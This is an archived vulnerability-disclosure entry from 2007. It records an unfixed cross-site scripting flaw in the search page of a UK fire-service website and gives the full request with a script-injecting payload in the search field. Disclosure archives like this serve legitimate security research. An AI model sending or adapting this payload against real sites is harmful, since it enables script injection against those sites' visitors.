Security researcher Zer0Man submitted on 04/12/2007 a cross-site scripting (XSS) vulnerability affecting www.dsfire.gov.uk, which at the time of submission ranked 2085036 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/12/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 04/12/2007
Date published: 04/12/2007
Status: UNFIXED
Author: Zer0Man
Domain: www.dsfire.gov.uk
Category: XSS
Pagerank: 2085036
URL: http://www.dsfire.gov.uk/MCMS_DevonFireVB/Templates/SearchResults.aspx?NRMODE=Published&NRNODEGUID=%7b2BB42892-2D4C-4173-9F8B-D8E68D984CC8%7d&NRORIGINALURL=%2fdevonfire%2fSearchResults.htm&NRCACHEHINT=Guest
POST: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE4Njg0MjQ2MjYPZBYCZg9kFgICAw9kFg4CAQ8PFgIeB1 Zpc2libGVoZBYCAgEPDxYCHgRUZXh0BRdFbnRlciBzZWFyY2ggd29yZHMgaGVyZRYCHgdvbkZvY3VzBRRqYXZhc2NyaXB0OnNlbG VjdCgpO2QCBQ9kFgICAQ8WAh8BBU48bGk%2BPGEgaHJlZiA9Ii9EZXZvbkZpcmUvQ29udGFjdFVzLmh0bSIgVGl0bGU9IkNvbnRh Y3QgVXMiPkNvbnRhY3QgVXM8L2E%2BPC9saT5kAgkPZBYIAgMPD2QWAh8CBRRqYXZhc2NyaXB0OnNlbGVjdCgpO2QCEA8PFgIfAG hkZAISDw8WAh8AaGRkAhQPDxYCHwBoZGQCCw8PFgIfAGhkFgICAw88KwAJAQAPFgIeDU5ldmVyRXhwYW5kZWRnZGQCDQ9kFgYCAQ 9kFgJmDxYCHwFlZAIDD2QWAmYPFgIfAWVkAgUPZBYCAgEPFgIfAWVkAg8PZBYCAgEPFgIfAQX%2BATxsaT48YSBocmVmID0iL0Rl dm9uRmlyZS9QcmludEhlbHAuaHRtIiBUaXRsZT0iSGVscCB3aXRoIFByaW50aW5nIj5IZWxwIHdpdGggUHJpbnRpbmc8L2E%2BPC 9saT48bGk%2BPGEgaHJlZiA9Ii9EZXZvbkZpcmUvQWNjZXNzaWJpbGl0eS5odG0iIFRpdGxlPSJBY2Nlc3NpYmlsaXR5Ij5BY2Nl c3NpYmlsaXR5PC9hPjwvbGk%2BPGxpPjxhIGhyZWYgPSIvRGV2b25GaXJlL1NpdGVNYXAuaHRtIiBUaXRsZT0iU2l0ZSBNYXAiPl NpdGUgTWFwPC9hPjwvbGk%2BZAIRD2QWBAIBDxYCHwBoZAIDDxYCHwBoZGRrFfb8ds751hH2x33eOENUXkDM7w%3D%3D&_ctl0%3 AContentPlaceHolder1%3AtxtSearch=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_ctl0%3AContentPla ceHolder1%3AButton1=Go&_ctl0%3AContentPlaceHolder1%3ARadioButtonList=0&__EVENTVALIDATION=%2FwEWCgKAw du0AwL7s5WNCwKd%2FJaKAwKRleuVAQKYy4jcBQKHy4jcBQKGy4jcBQKIpKKyCQL6xaz1DgKd6v%2F0A4dRvjOAjkQ9H1VyQPICe doZKIYq